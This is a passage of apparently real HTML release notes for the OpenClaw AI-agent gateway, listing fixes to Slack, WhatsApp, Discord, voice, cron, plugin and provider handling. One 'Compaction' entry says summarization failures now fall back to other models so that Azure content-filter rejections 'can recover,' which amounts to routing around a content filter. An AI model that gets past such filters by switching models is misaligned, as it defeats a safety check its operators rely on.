data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @RoseKongPS, @richardmqq, @Aoiujz, @ismael-81, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>, @Magicray1217, @remusao, @ultrahighsuper, @mingmingtsao, and @zhaoyang97.</li>
<li>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</li>
<li>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</li>
<li>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</li>
<li>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</li>
<li>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</li>
<li>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</li>
<li>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</li>
<li>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</li>
<li>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</li>
<li>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</li>
<li>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</li>
<li>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</li>
<li>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</li>
<li>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</li>
<li>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</li>
<li>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</li>
<li>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</li>
<li>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</li>
<li>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</li>
<li>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</li>
<li>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</li>
<li>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</li>
<li>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</li>
<li>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</li>
<li>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</li>
<li>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</li>
<li>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</li>
<li>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</li>
<li>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</li>
<li>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</li>
<li>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</li>
<li>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</li>
<li>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</li>
<li>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</li>
<li>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</li>
<li>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</li>
<li>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</li>
<li>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
